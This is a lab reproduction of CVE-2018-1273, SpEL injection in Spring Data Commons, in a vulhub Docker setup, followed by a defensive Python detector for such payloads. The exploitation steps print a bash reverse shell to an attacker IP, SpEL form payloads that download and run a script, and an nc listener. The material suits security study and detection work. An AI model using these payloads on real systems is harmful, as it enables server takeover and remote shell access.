1. Vulnerability Description
Spring Data is an open-source framework that simplifies database access and supports cloud services. It includes the Commons, Gemfire, JPA, JDBC, MongoDB and other modules. This vulnerability lies in the Spring Data Commons component, which provides the shared base framework used by the various sub-projects and supports persistence across different databases.
Spring Data Commons contains a remote code execution vulnerability: a SpEL expression supplied by an attacker is evaluated on the server, so crafted input can execute arbitrary commands and give the attacker control of the server.
2. Affected versions
Spring Data Commons 1.13 to 1.13.10 (Ingalls SR10)
Spring Data REST 2.6 to 2.6.10 (Ingalls SR10)
Spring Data Commons 2.0 to 2.0.5 (Kay SR5)
Spring Data REST 3.0 to 3.0.5 (Kay SR5)
3. Set up the environment
cd vulhub/spring/CVE-2018-1273
docker-compose up -d
4. Vulnerability Reproduction
1. Prepare the shell command: write the following line into shell.sh
bash -i >& /dev/tcp/192.168.155.2/1111 0>&1
2. Start an HTTP server in the directory containing shell.sh:
python -m http.server 8081
3. Capture the request: visit http://192.168.25.128:8080/users, submit the registration form, and capture the request with Burp Suite (BP).
4. Prepare the request packages
Payload:
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("[Command to be executed]")]=&password=&repeatedPassword=
Download-file request package:
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh")]&password=test&repeatedPassword=test
Execute-command request package:
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("/bin/bash /tmp/1.sh")]&password=test&repeatedPassword=test
5. Start an nc listener on the attacker host (port 1111).
6. Send the request packages: send the download package first and confirm that 1.sh has appeared in /tmp, then send the execution package.
7. The reverse shell connects back to the nc listener.
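As an added defender-side example (not part of this writeup or of the vulhub project), the following Python script flags form parameters whose name carries a bracketed SpEL expression of the shape used in the request packages above, and checks a Spring Data artifact version against the affected ranges listed in section 2. The sample request bodies are constructed for the demonstration.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl

# A bracketed property-path segment that opens a SpEL expression: name[#...]
SPEL_SEGMENT = re.compile(r"\[\s*#.*?\]", re.DOTALL)
# Tokens that indicate reflection or process execution inside the expression.
DANGEROUS_TOKENS = ("getClass(", "forName(", "getRuntime(", "exec(", "ProcessBuilder")

# Inclusive vulnerable ranges, taken from the affected-versions list in section 2.
AFFECTED_RANGES: Dict[str, List[Tuple[tuple, tuple]]] = {
    "spring-data-commons": [((1, 13, 0), (1, 13, 10)), ((2, 0, 0), (2, 0, 5))],
    "spring-data-rest": [((2, 6, 0), (2, 6, 10)), ((3, 0, 0), (3, 0, 5))],
}

def find_spel_params(body: str) -> List[dict]:
    """Flag form parameters whose *name* carries a SpEL expression."""
    findings = []
    for name, _value in parse_qsl(body, keep_blank_values=True):
        match = SPEL_SEGMENT.search(name)
        if match is None:  # plain name, or an ordinary index such as user[0]
            continue
        expr = match.group(0)
        findings.append({
            "param": name.split("[", 1)[0],
            "expression": expr,
            "indicators": [t for t in DANGEROUS_TOKENS if t in expr],
        })
    return findings

def is_affected(artifact: str, version: str) -> bool:
    """True if a Maven version such as '2.0.5.RELEASE' lies in a vulnerable range."""
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if match is None:
        raise ValueError(f"unrecognised version string: {version!r}")
    parts = tuple(int(p) for p in match.groups())
    return any(lo <= parts <= hi for lo, hi in AFFECTED_RANGES.get(artifact, []))

# Constructed sample bodies; the first has the shape of the payload shown above.
SAMPLE_BODIES = {
    "spel": 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("id")]'
            "&password=test&repeatedPassword=test",
    "benign": "username=alice&password=secret&repeatedPassword=secret",
    "indexed": "username[0]=alice&password=secret",
}

if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(label, find_spel_params(body))
    print(is_affected("spring-data-commons", "2.0.5.RELEASE"))
```

The same check can be run over decoded POST bodies from a WAF or application log; a parameter name matching name[#...] is never produced by a legitimate Spring form.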
Note on wget: the -O option saves the downloaded file under the name given, for example:
wget -O /usr/software https://download.redis.io/releases/redis-6.0.8.tar.gz